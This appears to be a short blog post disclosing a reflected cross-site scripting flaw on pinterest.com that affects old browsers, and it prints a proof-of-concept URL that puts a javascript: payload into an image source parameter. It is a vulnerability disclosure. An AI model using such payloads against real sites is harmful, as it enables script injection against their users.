XSS Exploiting via Old Browsers Flaw‏ on Pinterest.com

The flaw is an Image XSS using the JavaScript directive affecting the following browsers
[IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02].
Although new browsers have already patched this issue, it is still a security flaw.
According to a research here http://www.ie6countdown.com/
6.1% of the world’s population still uses IE6
22.2% of population in china also still uses IE6

The reflected xss is located here
pinterest.com/pin/create/button/?&media=javascript:alert(1)
The value of the parameter ‘media’ will be inserted into the img src.

<img src="javascript:alert(1)" class="pinPreviewImg" style="">

Hence javascript will be executed

pinterestxss

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s